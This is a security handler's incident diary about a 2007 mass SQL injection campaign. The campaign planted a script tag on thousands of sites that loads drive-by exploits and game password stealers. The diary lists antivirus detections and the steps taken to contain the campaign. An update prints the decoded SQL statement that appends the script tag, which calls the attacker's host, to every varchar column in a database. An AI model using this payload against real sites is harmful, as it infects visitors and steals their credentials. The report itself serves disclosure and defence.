Last Updated: 2007-11-07 09:03:51 UTC
by Maarten Van Horenbeeck (Version: 3)
Zack wrote to us yesterday to report a mass defacement. After a brief look, we were able to confirm his finding that the following script tag (obfuscated) had been injected in over 40 000 pages across the internet, covering around 150 domains which we so far know of.
script src="hXXp://yl 18.net/0.js"
This script generates a page containing several hidden iframe components. These link to other pages that contain browser specific exploit code, such as the common ADODB exploit. This code downloads, without prompting, a small number of executable droppers, and executes them on vulnerable systems.
Upon review, most of the binaries downloaded appeared to be password stealers for online games, but not all have been reviewed yet. Anti virus coverage differed greatly between several binaries. Below is the virustotal output for one sample:
AhnLab-V3 2007.11.7.0 2007.11.06 -
AntiVir 22.214.171.124 2007.11.06 TR/PSW.OnlineGames.gul
Authentium 4.93.8 2007.11.05 -
Avast 4.7.1074.0 2007.11.05 -
AVG 126.96.36.1993 2007.11.06 PSW.OnlineGames.QCP
BitDefender 7.2 2007.11.06 Trojan.PWS.Onlinegames.NMG
CAT-QuickHeal 9.00 2007.11.06 TrojanPSW.OnLineGames.gul
ClamAV 0.91.2 2007.11.06 -
DrWeb 4.44.0.09170 2007.11.06 Trojan.PWS.Gamania.5503
eSafe 188.8.131.52 2007.10.28 suspicious Trojan/Worm
eTrust-Vet 31.2.5270 2007.11.05 -
Ewido 4.0 2007.11.06 -
FileAdvisor 1 2007.11.06 -
Fortinet 184.108.40.206 2007.10.19 -
F-Prot 220.127.116.11 2007.11.06 -
F-Secure 6.70.13030.0 2007.11.06 Trojan-PSW.Win32.OnLineGames.gul
Ikarus T18.104.22.168 2007.11.06 Trojan-PWS.Win32.OnLineGames.gul
Kaspersky 22.214.171.124 2007.11.06 Trojan-PSW.Win32.OnLineGames.gul
McAfee 5157 2007.11.06 -
Microsoft 1.3007 2007.11.06 -
NOD32v2 2641 2007.11.06 -
Norman 5.80.02 2007.11.06 W32/OnLineGames.SPZ
Panda 126.96.36.199 2007.11.06 Suspicious file
Prevx1 V2 2007.11.06 Heuristic: Suspicious File With Persistence
Rising 20.17.12.00 2007.11.06 -
Sophos 4.23.0 2007.11.06 Mal/Packer
Sunbelt 2.2.907.0 2007.11.06 VIPRE.Suspicious
Symantec 10 2007.11.06 Infostealer.Gampass
TheHacker 188.8.131.52 2007.11.06 -
VBA32 184.108.40.206 2007.11.06 -
VirusBuster 4.3.26:9 2007.11.06 Packed/FSG
Webwasher-Gateway 6.0.1 2007.11.06 Trojan.PSW.OnlineGames.gul
This type of widespread attack can incur a serious toll and requires follow up. At the ISC, we not only try to assess how to have a piece of malicious code taken down, but also what the attacker's next steps will be. We generally take at least the following steps to contain the incident:
- Inform the ISP hosting the malicious code. In this case, this was CHINANET, who have a massive deployed base and are not always able to respond promptly;
- If we receive no response or suspect a language issue, we inform the local incident response team (CSIRT/CERT) and ask them for assistance;
- We gather samples of the affected malicious code and distribute it to anti virus vendors to have them build coverage;
- If it’s an important issue, we report it here on the diary so organizations can implement controls to protect themselves against infection.
We also assess what the attacker spent most time working on. In this case, compromising a single server in China and hosting a malicious script is low effort and can easily be repeated. Attacking thousands of sites and adding a link to them is his actual investment.
As such, once the server is taken offline, the attacker will promptly move hosting for the yl18.net domain to another server. If the domain is likely fully malicious, we try to pre-empt this and inform the registrar that the domain is used for illegal activities and should be disabled.
This is a problem – most registrars do not really care what a domain is used for. Generally malicious domains are however paid for with fake credit cards, and if this can be identified, they have the legal ability to disable the domain.
These efforts take lots of time, and at this point in time, the server hosting yl18.net is still online and serving malicious code. Various .com web sites have been defaced with the script tag, most likely through SQL injection or cross site scripting, and are infecting their users.
If you have the ability to do so, we suggest blocking traffic to yl18.net at your gateway.
UPDATE: A reader wrote in with some information on how his site was compromised. He confirmed the SQL injection pathway. Fellow handler Bojan had a look at the SQL statement, which was CAST away as HEX in a variable:
declare @m varchar(8000); set @m=''; select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script src="hxxp://yl 18.net/0.js"></script>'';' from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and b.xtype=c.xtype and c.name='varchar' set @m=REVERSE(@m) set @m=substring(@m,PATINDEX('%;%',@m),8000); set @m=REVERSE(@m); exec(@m);
This code adds the malicious script tag to all user table objects which meet specific criteria (type varchar). It also explains why such a large number of pages per site have been affected.
Maarten Van Horenbeeck